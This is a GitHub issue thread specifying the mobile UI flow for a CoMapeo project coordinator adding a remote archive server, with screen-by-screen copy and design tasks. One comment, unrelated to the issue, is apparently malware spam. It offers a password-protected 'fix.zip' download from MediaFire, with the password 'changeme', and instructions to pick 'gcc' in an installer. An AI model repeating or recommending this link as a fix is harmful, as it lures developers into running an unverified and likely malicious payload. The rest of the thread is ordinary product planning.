### ISSUE TITLE
Coordinator / Adding Server - Success

### ISSUE THREAD

**Issue by ximenabb** [digidem/comapeo-mobile#621]
**Description**
CoMapeo Cloud “community edition” (Pending Title)

This is a version of CoMapeo designed to run on a server with no UI for editing or viewing the data — it is just for data storage and sync. A user could self-host it on a local machine like a Raspberry Pi, or use a hosting company like Digital Ocean. It would be need to be manually configured to be part of a project, but after that other Mapeo devices in the project would see it as any other internet-connected device — it would essentially be “headless Mapeo Desktop”.

- Open source
- Single project per instance
- API to share all-or-nothing read-access to data externally (protected by access token)
- Manual setup (requires knowledge about how to run a server)
- User pays their own hosting costs

To note :
- Only a device who is a Coordinator can add a server

See documentation on the various option of Cloud : https://www.notion.so/digidem/Mapeo-Cloud-Sync-Community-Edition-3b72b6fbb47a460fa367722f80dffb6e

**Todo**
## Screen 1
<img width="284" alt="Screen Shot 2024-09-18 at 11 56 39 AM" src="https://github.com/user-attachments/assets/67e5f278-47ac-4844-b98a-aa999173b68f">

- [ ] Add a **Remote Server** button in Setting/Project Settings
- [ ] Under **Remote Server**, display text _Remote Server is OFF_ when no server was added
- [ ] Under **Remote Server**, display text _Remote Server is ON_ when a server was added

## Screen 2
<img width="277" alt="Screen Shot 2024-09-18 at 11 58 40 AM" src="https://github.com/user-attachments/assets/ee3aef6f-3151-4dbe-b421-f0b17988f0e7">

- [ ] Display screen as designed
- [ ] Use copy _Remote Archive is Off_ (if server off)
- [ ] _The data in your project is not shared over the internet. Only people in your project can see your data._
- [ ] _This is an experimental feature. You need a Remote Archive URL to enable Remote Archive._
- [ ] Display _No Servers have been added to this project_.  if no server was added
- [ ] Add a  **+ Add Remote Archive**  button

## Screen 3
<img width="278" alt="Screen Shot 2024-09-18 at 12 01 01 PM" src="https://github.com/user-attachments/assets/1382578a-fa93-4db4-8960-78d4fb37127c">

- [ ] Display screen as designed and follow usual design patterns
- [ ] If url is incorrect go to https://github.com/digidem/comapeo-mobile/issues/625

## Screen 4
<img width="277" alt="Screen Shot 2024-09-18 at 12 02 03 PM" src="https://github.com/user-attachments/assets/cc264a29-dc16-4406-87db-063b1cea4f81">

- [ ] Display screen as designed
- [ ] Display **Looking for Remote Archive...**
- [ ] Display searching animation until server found

## Screen 5
<img width="278" alt="Screen Shot 2024-09-18 at 12 03 07 PM" src="https://github.com/user-attachments/assets/e3f3742c-0753-43fd-af05-ad758d4025c1">

- [ ] Display screen as designed
- [ ] Display **You are adding:**
- [ ] Display name of server
- [ ] Display server address
- [ ] Add grey box with copy _When project participants sync their data, they will also be archived on the internet. Your project data is syncing to the archive over the internet to the secure, encrypted server below. The server owner can view the data. Only a Project Coordinator can turn off Remote Archive._
- [ ] In grey box, add **See What is Included** as clickable text
- [ ] When clicked, open bottom sheet with copy 
 - [ ] Add a  **+ Add Server**  button

## Screen 5.1 - Bottom sheet
<img width="281" alt="Screen Shot 2024-09-18 at 12 07 12 PM" src="https://github.com/user-attachments/assets/49bac098-332a-417c-ae4c-20fb3d7c5824">

- [ ] When **See What is Included** is clicked, open bottom sheet
- [ ] Dispay bottom sheet as designed
- [ ] Add copy _What is Included_
- [ ] _Observations (including photos and audio)_
- [ ] _Tracks_
- [ ] _Device Names_
- [ ] _Project Settings (categories, questions)_
- [ ]  Add a  **Close**  button

## Screen 6
<img width="282" alt="Screen Shot 2024-09-18 at 12 14 04 PM" src="https://github.com/user-attachments/assets/5841bcb6-6e57-40ed-8934-083e63dfebc9">

- [ ] Display screen as designed
- [ ] Use provisory copy _Remote Archive Added_
- [ ] _All project devices can sync with this Archive, sharing data over the internet.._
- [ ] Display server name and address
- [ ] Add a  **Close**  button

## Screen 7
<img width="284" alt="Screen Shot 2024-09-18 at 12 16 54 PM" src="https://github.com/user-attachments/assets/d4dba8fe-0068-46d1-9b16-3e64c0ae23d9">

- [ ] Update Screen 1
- [ ] Display _Remote Archive is On_
- [ ] Add copy _Your project data is syncing to the archive over the internet to the secure, encrypted server below. The server owner can view the data. Remove the server to stop Remote Archive._
- [ ] Add copy _This includes: Observations (including photos and audio) Tracks Device Names Project Settings (categories, questions)_
- [ ] Add box and display Server Name and Server Address, under server name
- [ ] Add date added, under date added
- [ ] Add **Remove Server** button
- [ ] When **Remove Server** button clicked, go to https://github.com/digidem/comapeo-mobile/issues/626

**Design**
https://www.figma.com/design/iUeC0Qzhb4H0unuPfxQAsM/(Mobile)-CoMapeo?node-id=2909-1931&t=3MJwxcx0iGMHqAbR-1

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ximenabb** [comment]
updated figma link
